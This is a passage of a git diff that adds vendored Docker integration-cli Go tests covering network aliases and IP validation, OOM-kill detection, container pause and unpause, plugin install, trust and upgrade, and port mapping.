+	_, err = s.d.Cmd("kill", oldCon)
+	if err != nil {
+		t.Fatal(err)
+	}
+	id, err := s.d.Cmd("run", "-p", "80:80", "-d", "busybox", "top")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Cleanup because these containers will not be shut down by daemon
+	out, err = s.d.Cmd("stop", newCon)
+	if err != nil {
+		t.Fatalf("err: %v %v", err, string(out))
+	}
+	_, err = s.d.Cmd("stop", strings.TrimSpace(id))
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkFlagAlias(c *check.C) {
+	dockerCmd(c, "network", "create", "user")
+	output, status := dockerCmd(c, "run", "--rm", "--network=user", "--network-alias=foo", "busybox", "true")
+	c.Assert(status, checker.Equals, 0, check.Commentf("unexpected status code %d (%s)", status, output))
+
+	output, status, _ = dockerCmdWithError("run", "--rm", "--net=user", "--network=user", "busybox", "true")
+	c.Assert(status, checker.Equals, 0, check.Commentf("unexpected status code %d (%s)", status, output))
+
+	output, status, _ = dockerCmdWithError("run", "--rm", "--network=user", "--net-alias=foo", "--network-alias=bar", "busybox", "true")
+	c.Assert(status, checker.Equals, 0, check.Commentf("unexpected status code %d (%s)", status, output))
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkValidateIP(c *check.C) {
+	_, _, err := dockerCmdWithError("network", "create", "--ipv6", "--subnet=172.28.0.0/16", "--subnet=2001:db8:1234::/64", "mynet")
+	c.Assert(err, check.IsNil)
+	assertNwIsAvailable(c, "mynet")
+
+	_, _, err = dockerCmdWithError("run", "-d", "--name", "mynet0", "--net=mynet", "--ip", "172.28.99.88", "--ip6", "2001:db8:1234::9988", "busybox", "top")
+	c.Assert(err, check.IsNil)
+	c.Assert(waitRun("mynet0"), check.IsNil)
+	verifyIPAddressConfig(c, "mynet0", "mynet", "172.28.99.88", "2001:db8:1234::9988")
+	verifyIPAddresses(c, "mynet0", "mynet", "172.28.99.88", "2001:db8:1234::9988")
+
+	_, _, err = dockerCmdWithError("run", "--net=mynet", "--ip", "mynet_ip", "--ip6", "2001:db8:1234::9999", "busybox", "top")
+	c.Assert(err.Error(), checker.Contains, "invalid IPv4 address")
+	_, _, err = dockerCmdWithError("run", "--net=mynet", "--ip", "172.28.99.99", "--ip6", "mynet_ip6", "busybox", "top")
+	c.Assert(err.Error(), checker.Contains, "invalid IPv6 address")
+	// This is a case of IPv4 address to `--ip6`
+	_, _, err = dockerCmdWithError("run", "--net=mynet", "--ip6", "172.28.99.99", "busybox", "top")
+	c.Assert(err.Error(), checker.Contains, "invalid IPv6 address")
+	// This is a special case of an IPv4-mapped IPv6 address
+	_, _, err = dockerCmdWithError("run", "--net=mynet", "--ip6", "::ffff:172.28.99.99", "busybox", "top")
+	c.Assert(err.Error(), checker.Contains, "invalid IPv6 address")
+}
+
+// Test case for 26220
+func (s *DockerNetworkSuite) TestDockerNetworkDisconnectFromBridge(c *check.C) {
+	out, _ := dockerCmd(c, "network", "inspect", "--format", "{{.Id}}", "bridge")
+
+	network := strings.TrimSpace(out)
+
+	name := "test"
+	dockerCmd(c, "create", "--name", name, "busybox", "top")
+
+	_, _, err := dockerCmdWithError("network", "disconnect", network, name)
+	c.Assert(err, check.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go
new file mode 100644
index 0000000000..bcf59f8601
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go
@@ -0,0 +1,30 @@
+// +build !windows
+
+package main
+
+import (
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestInspectOomKilledTrue(c *check.C) {
+	testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport)
+
+	name := "testoomkilled"
+	_, exitCode, _ := dockerCmdWithError("run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done")
+
+	c.Assert(exitCode, checker.Equals, 137, check.Commentf("OOM exit should be 137"))
+
+	oomKilled := inspectField(c, name, "State.OOMKilled")
+	c.Assert(oomKilled, checker.Equals, "true")
+}
+
+func (s *DockerSuite) TestInspectOomKilledFalse(c *check.C) {
+	testRequires(c, DaemonIsLinux, memoryLimitSupport, swapMemorySupport)
+
+	name := "testoomkilled"
+	dockerCmd(c, "run", "--name", name, "--memory", "32MB", "busybox", "sh", "-c", "echo hello world")
+
+	oomKilled := inspectField(c, name, "State.OOMKilled")
+	c.Assert(oomKilled, checker.Equals, "false")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go
new file mode 100644
index 0000000000..9217a69968
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go
@@ -0,0 +1,66 @@
+package main
+
+import (
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestPause(c *check.C) {
+	testRequires(c, IsPausable)
+	defer unpauseAllContainers()
+
+	name := "testeventpause"
+	runSleepingContainer(c, "-d", "--name", name)
+
+	dockerCmd(c, "pause", name)
+	pausedContainers, err := getSliceOfPausedContainers()
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(pausedContainers), checker.Equals, 1)
+
+	dockerCmd(c, "unpause", name)
+
+	out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c))
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	actions := eventActionsByIDAndType(c, events, name, "container")
+
+	c.Assert(actions[len(actions)-2], checker.Equals, "pause")
+	c.Assert(actions[len(actions)-1], checker.Equals, "unpause")
+}
+
+func (s *DockerSuite) TestPauseMultipleContainers(c *check.C) {
+	testRequires(c, IsPausable)
+	defer unpauseAllContainers()
+
+	containers := []string{
+		"testpausewithmorecontainers1",
+		"testpausewithmorecontainers2",
+	}
+	for _, name := range containers {
+		runSleepingContainer(c, "-d", "--name", name)
+	}
+	dockerCmd(c, append([]string{"pause"}, containers...)...)
+	pausedContainers, err := getSliceOfPausedContainers()
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(pausedContainers), checker.Equals, len(containers))
+
+	dockerCmd(c, append([]string{"unpause"}, containers...)...)
+
+	out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c))
+	events := strings.Split(strings.TrimSpace(out), "\n")
+
+	for _, name := range containers {
+		actions := eventActionsByIDAndType(c, events, name, "container")
+
+		c.Assert(actions[len(actions)-2], checker.Equals, "pause")
+		c.Assert(actions[len(actions)-1], checker.Equals, "unpause")
+	}
+}
+
+func (s *DockerSuite) TestPauseFailsOnWindowsServerContainers(c *check.C) {
+	testRequires(c, DaemonIsWindows, NotPausable)
+	runSleepingContainer(c, "-d", "--name=test")
+	out, _, _ := dockerCmdWithError("pause", "test")
+	c.Assert(out, checker.Contains, "cannot pause Windows Server Containers")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go
new file mode 100644
index 0000000000..380357d303
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go
@@ -0,0 +1,393 @@
+package main
+
+import (
+	"fmt"
+	"os/exec"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strings"
+)
+
+var (
+	pluginProcessName = "sample-volume-plugin"
+	pName             = "tiborvass/sample-volume-plugin"
+	npName            = "tiborvass/test-docker-netplugin"
+	pTag              = "latest"
+	pNameWithTag      = pName + ":" + pTag
+	npNameWithTag     = npName + ":" + pTag
+)
+
+func (s *DockerSuite) TestPluginBasicOps(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	_, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err := dockerCmdWithError("plugin", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pName)
+	c.Assert(out, checker.Contains, pTag)
+	c.Assert(out, checker.Contains, "true")
+
+	id, _, err := dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag)
+	id = strings.TrimSpace(id)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag)
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "is enabled")
+
+	_, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pNameWithTag)
+
+	_, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id))
+	if !os.IsNotExist(err) {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestPluginForceRemove(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag)
+	c.Assert(out, checker.Contains, "is enabled")
+
+	out, _, err = dockerCmdWithError("plugin", "remove", "--force", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pNameWithTag)
+}
+
+func (s *DockerSuite) TestPluginActive(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	_, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	_, _, err = dockerCmdWithError("volume", "create", "-d", pNameWithTag, "--name", "testvol1")
+	c.Assert(err, checker.IsNil)
+
+	out, _, err := dockerCmdWithError("plugin", "disable", pNameWithTag)
+	c.Assert(out, checker.Contains, "in use")
+
+	_, _, err = dockerCmdWithError("volume", "rm", "testvol1")
+	c.Assert(err, checker.IsNil)
+
+	_, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pNameWithTag)
+}
+
+func (s *DockerSuite) TestPluginActiveNetwork(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", npNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("network", "create", "-d", npNameWithTag, "test")
+	c.Assert(err, checker.IsNil)
+
+	nID := strings.TrimSpace(out)
+
+	out, _, err = dockerCmdWithError("plugin", "remove", npNameWithTag)
+	c.Assert(out, checker.Contains, "is in use")
+
+	_, _, err = dockerCmdWithError("network", "rm", nID)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("plugin", "remove", npNameWithTag)
+	c.Assert(out, checker.Contains, "is enabled")
+
+	_, _, err = dockerCmdWithError("plugin", "disable", npNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("plugin", "remove", npNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, npNameWithTag)
+}
+
+func (s *DockerSuite) TestPluginInstallDisable(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", "--disable", pName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
+
+	out, _, err = dockerCmdWithError("plugin", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "false")
+
+	out, _, err = dockerCmdWithError("plugin", "enable", pName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
+
+	out, _, err = dockerCmdWithError("plugin", "disable", pName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
+
+	out, _, err = dockerCmdWithError("plugin", "remove", pName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
+}
+
+func (s *DockerSuite) TestPluginInstallDisableVolumeLs(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", "--disable", pName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
+
+	dockerCmd(c, "volume", "ls")
+}
+
+func (s *DockerSuite) TestPluginSet(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName)
+	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
+
+	env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName)
+	c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=0]")
+
+	dockerCmd(c, "plugin", "set", pName, "DEBUG=1")
+
+	env, _ = dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName)
+	c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]")
+}
+
+func (s *DockerSuite) TestPluginInstallArgs(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	out, _ := dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--disable", pName, "DEBUG=1")
+	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
+
+	env, _ := dockerCmd(c, "plugin", "inspect", "-f", "{{.Settings.Env}}", pName)
+	c.Assert(strings.TrimSpace(env), checker.Equals, "[DEBUG=1]")
+}
+
+func (s *DockerRegistrySuite) TestPluginInstallImage(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64)
+
+	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+	// tag the image to upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+	// push the image to the registry
+	dockerCmd(c, "push", repoName)
+
+	out, _, err := dockerCmdWithError("plugin", "install", repoName)
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "target is image")
+}
+
+func (s *DockerSuite) TestPluginEnableDisableNegative(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	out, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, pName)
+
+	out, _, err = dockerCmdWithError("plugin", "enable", pName)
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, "already enabled")
+
+	_, _, err = dockerCmdWithError("plugin", "disable", pName)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("plugin", "disable", pName)
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, "already disabled")
+
+	_, _, err = dockerCmdWithError("plugin", "remove", pName)
+	c.Assert(err, checker.IsNil)
+}
+
+func (s *DockerSuite) TestPluginCreate(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+
+	name := "foo/bar-driver"
+	temp, err := ioutil.TempDir("", "foo")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(temp)
+
+	data := `{"description": "foo plugin"}`
+	err = ioutil.WriteFile(filepath.Join(temp, "config.json"), []byte(data), 0644)
+	c.Assert(err, checker.IsNil)
+
+	err = os.MkdirAll(filepath.Join(temp, "rootfs"), 0700)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err := dockerCmdWithError("plugin", "create", name, temp)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name)
+
+	out, _, err = dockerCmdWithError("plugin", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name)
+
+	out, _, err = dockerCmdWithError("plugin", "create", name, temp)
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "already exist")
+
+	out, _, err = dockerCmdWithError("plugin", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name)
+	// The output will consists of one HEADER line and one line of foo/bar-driver
+	c.Assert(len(strings.Split(strings.TrimSpace(out), "\n")), checker.Equals, 2)
+}
+
+func (s *DockerSuite) TestPluginInspect(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	_, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err := dockerCmdWithError("plugin", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pName)
+	c.Assert(out, checker.Contains, pTag)
+	c.Assert(out, checker.Contains, "true")
+
+	// Find the ID first
+	out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	id := strings.TrimSpace(out)
+	c.Assert(id, checker.Not(checker.Equals), "")
+
+	// Long form
+	out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", id)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, id)
+
+	// Short form
+	out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", id[:5])
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, id)
+
+	// Name with tag form
+	out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, id)
+
+	// Name without tag form
+	out, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", pName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, id)
+
+	_, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pNameWithTag)
+
+	// After remove nothing should be found
+	_, _, err = dockerCmdWithError("plugin", "inspect", "-f", "{{.Id}}", id[:5])
+	c.Assert(err, checker.NotNil)
+}
+
+// Test case for https://github.com/docker/docker/pull/29186#discussion_r91277345
+func (s *DockerSuite) TestPluginInspectOnWindows(c *check.C) {
+	// This test should work on Windows only
+	testRequires(c, DaemonIsWindows)
+
+	out, _, err := dockerCmdWithError("plugin", "inspect", "foobar")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "plugins are not supported on this platform")
+	c.Assert(err.Error(), checker.Contains, "plugins are not supported on this platform")
+}
+
+func (s *DockerTrustSuite) TestPluginTrustedInstall(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+
+	trustedName := s.setupTrustedplugin(c, pNameWithTag, "trusted-plugin-install")
+
+	installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", trustedName)
+	s.trustedCmd(installCmd)
+	out, _, err := runCommandWithOutput(installCmd)
+
+	c.Assert(strings.TrimSpace(out), checker.Contains, trustedName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, trustedName)
+
+	out, _, err = dockerCmdWithError("plugin", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "true")
+
+	out, _, err = dockerCmdWithError("plugin", "disable", trustedName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, trustedName)
+
+	out, _, err = dockerCmdWithError("plugin", "enable", trustedName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, trustedName)
+
+	out, _, err = dockerCmdWithError("plugin", "rm", "-f", trustedName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, trustedName)
+
+	// Try untrusted pull to ensure we pushed the tag to the registry
+	installCmd = exec.Command(dockerBinary, "plugin", "install", "--disable-content-trust=true", "--grant-all-permissions", trustedName)
+	s.trustedCmd(installCmd)
+	out, _, err = runCommandWithOutput(installCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out))
+
+	out, _, err = dockerCmdWithError("plugin", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "true")
+
+}
+
+func (s *DockerTrustSuite) TestPluginUntrustedInstall(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+
+	pluginName := fmt.Sprintf("%v/dockercliuntrusted/plugintest:latest", privateRegistryURL)
+	// install locally and push to private registry
+	dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", pluginName, pNameWithTag)
+	dockerCmd(c, "plugin", "push", pluginName)
+	dockerCmd(c, "plugin", "rm", "-f", pluginName)
+
+	// Try trusted install on untrusted plugin
+	installCmd := exec.Command(dockerBinary, "plugin", "install", "--grant-all-permissions", pluginName)
+	s.trustedCmd(installCmd)
+	out, _, err := runCommandWithOutput(installCmd)
+
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out))
+}
+
+func (s *DockerSuite) TestPluginUpgrade(c *check.C) {
+	testRequires(c, DaemonIsLinux, Network, SameHostDaemon, IsAmd64)
+	plugin := "cpuguy83/docker-volume-driver-plugin-local:latest"
+	pluginV2 := "cpuguy83/docker-volume-driver-plugin-local:v2"
+
+	dockerCmd(c, "plugin", "install", "--grant-all-permissions", plugin)
+	dockerCmd(c, "volume", "create", "--driver", plugin, "bananas")
+	dockerCmd(c, "run", "--rm", "-v", "bananas:/apple", "busybox", "sh", "-c", "touch /apple/core")
+
+	out, _, err := dockerCmdWithError("plugin", "upgrade", "--grant-all-permissions", plugin, pluginV2)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "disabled before upgrading")
+
+	out, _ = dockerCmd(c, "plugin", "inspect", "--format={{.ID}}", plugin)
+	id := strings.TrimSpace(out)
+
+	// make sure "v2" does not exists
+	_, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2"))
+	c.Assert(os.IsNotExist(err), checker.True, check.Commentf(out))
+
+	dockerCmd(c, "plugin", "disable", "-f", plugin)
+	dockerCmd(c, "plugin", "upgrade", "--grant-all-permissions", "--skip-remote-check", plugin, pluginV2)
+
+	// make sure "v2" file exists
+	_, err = os.Stat(filepath.Join(dockerBasePath, "plugins", id, "rootfs", "v2"))
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "plugin", "enable", plugin)
+	dockerCmd(c, "volume", "inspect", "bananas")
+	dockerCmd(c, "run", "--rm", "-v", "bananas:/apple", "busybox", "sh", "-c", "ls -lh /apple/core")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go
new file mode 100644
index 0000000000..80b00fe93e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go
@@ -0,0 +1,319 @@
+package main
+
+import (
+	"fmt"
+	"net"
+	"regexp"
+	"sort"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestPortList(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// one port
+	out, _ := dockerCmd(c, "run", "-d", "-p", "9876:80", "busybox", "top")
+	firstID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "port", firstID, "80")
+
+	err := assertPortList(c, out, []string{"0.0.0.0:9876"})
+	// Port list is not correct
+	c.Assert(err, checker.IsNil)
+
+	out, _ = dockerCmd(c, "port", firstID)
+
+	err = assertPortList(c, out, []string{"80/tcp -> 0.0.0.0:9876"})
+	// Port list is not correct
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "rm", "-f", firstID)
+
+	// three port
+	out, _ = dockerCmd(c, "run", "-d",
+		"-p", "9876:80",
+		"-p", "9877:81",
+		"-p", "9878:82",
+		"busybox", "top")
+	ID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "port", ID, "80")
+
+	err = assertPortList(c, out, []string{"0.0.0.0:9876"})
+	// Port list is not correct
+	c.Assert(err, checker.IsNil)
+
+	out, _ = dockerCmd(c, "port", ID)
+
+	err = assertPortList(c, out, []string{
+		"80/tcp -> 0.0.0.0:9876",
+		"81/tcp -> 0.0.0.0:9877",
+		"82/tcp -> 0.0.0.0:9878"})
+	// Port list is not correct
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "rm", "-f", ID)
+
+	// more and one port mapped to the same container port
+	out, _ = dockerCmd(c, "run", "-d",
+		"-p", "9876:80",
+		"-p", "9999:80",
+		"-p", "9877:81",
+		"-p", "9878:82",
+		"busybox", "top")
+	ID = strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "port", ID, "80")
+
+	err = assertPortList(c, out, []string{"0.0.0.0:9876", "0.0.0.0:9999"})
+	// Port list is not correct
+	c.Assert(err, checker.IsNil)
+
+	out, _ = dockerCmd(c, "port", ID)
+
+	err = assertPortList(c, out, []string{
+		"80/tcp -> 0.0.0.0:9876",
+		"80/tcp -> 0.0.0.0:9999",
+		"81/tcp -> 0.0.0.0:9877",
+		"82/tcp -> 0.0.0.0:9878"})
+	// Port list is not correct
+	c.Assert(err, checker.IsNil)
+	dockerCmd(c, "rm", "-f", ID)
+
+	testRange := func() {
+		// host port ranges used
+		IDs := make([]string, 3)
+		for i := 0; i < 3; i++ {
+			out, _ = dockerCmd(c, "run", "-d",
+				"-p", "9090-9092:80",
+				"busybox", "top")
+			IDs[i] = strings.TrimSpace(out)
+
+			out, _ = dockerCmd(c, "port", IDs[i])
+
+			err = assertPortList(c, out, []string{fmt.Sprintf("80/tcp -> 0.0.0.0:%d", 9090+i)})
+			// Port list is not correct
+			c.Assert(err, checker.IsNil)
+		}
+
+		// test port range exhaustion
+		out, _, err = dockerCmdWithError("run", "-d",
+			"-p", "9090-9092:80",
+			"busybox", "top")
+		// Exhausted port range did not return an error
+		c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+
+		for i := 0; i < 3; i++ {
+			dockerCmd(c, "rm", "-f", IDs[i])
+		}
+	}
+	testRange()
+	// Verify we ran re-use port ranges after they are no longer in use.
+	testRange()
+
+	// test invalid port ranges
+	for _, invalidRange := range []string{"9090-9089:80", "9090-:80", "-9090:80"} {
+		out, _, err = dockerCmdWithError("run", "-d",
+			"-p", invalidRange,
+			"busybox", "top")
+		// Port range should have returned an error
+		c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	}
+
+	// test host range:container range spec.
+	out, _ = dockerCmd(c, "run", "-d",
+		"-p", "9800-9803:80-83",
+		"busybox", "top")
+	ID = strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "port", ID)
+
+	err = assertPortList(c, out, []string{
+		"80/tcp -> 0.0.0.0:9800",
+		"81/tcp -> 0.0.0.0:9801",
+		"82/tcp -> 0.0.0.0:9802",
+		"83/tcp -> 0.0.0.0:9803"})
+	// Port list is not correct
+	c.Assert(err, checker.IsNil)
+	dockerCmd(c, "rm", "-f", ID)
+
+	// test mixing protocols in same port range
+	out, _ = dockerCmd(c, "run", "-d",
+		"-p", "8000-8080:80",
+		"-p", "8000-8080:80/udp",
+		"busybox", "top")
+	ID = strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "port", ID)
+
+	err = assertPortList(c, out, []string{
+		"80/tcp -> 0.0.0.0:8000",
+		"80/udp -> 0.0.0.0:8000"})
+	// Port list is not correct
+	c.Assert(err, checker.IsNil)
+	dockerCmd(c, "rm", "-f", ID)
+}
+
+func assertPortList(c *check.C, out string, expected []string) error {
+	lines := strings.Split(strings.Trim(out, "\n "), "\n")
+	if len(lines) != len(expected) {
+		return fmt.Errorf("different size lists %s, %d, %d", out, len(lines), len(expected))
+	}
+	sort.Strings(lines)
+	sort.Strings(expected)
+
+	for i := 0; i < len(expected); i++ {
+		if lines[i] != expected[i] {
+			return fmt.Errorf("|" + lines[i] + "!=" + expected[i] + "|")
+		}
+	}
+
+	return nil
+}
+
+func stopRemoveContainer(id string, c *check.C) {
+	dockerCmd(c, "rm", "-f", id)
+}
+
+func (s *DockerSuite) TestUnpublishedPortsInPsOutput(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// Run busybox with command line expose (equivalent to EXPOSE in image's Dockerfile) for the following ports
+	port1 := 80
+	port2 := 443
+	expose1 := fmt.Sprintf("--expose=%d", port1)
+	expose2 := fmt.Sprintf("--expose=%d", port2)
+	dockerCmd(c, "run", "-d", expose1, expose2, "busybox", "sleep", "5")
+
+	// Check docker ps o/p for last created container reports the unpublished ports
+	unpPort1 := fmt.Sprintf("%d/tcp", port1)
+	unpPort2 := fmt.Sprintf("%d/tcp", port2)
+	out, _ := dockerCmd(c, "ps", "-n=1")
+	// Missing unpublished ports in docker ps output
+	c.Assert(out, checker.Contains, unpPort1)
+	// Missing unpublished ports in docker ps output
+	c.Assert(out, checker.Contains, unpPort2)
+
+	// Run the container forcing to publish the exposed ports
+	dockerCmd(c, "run", "-d", "-P", expose1, expose2, "busybox", "sleep", "5")
+
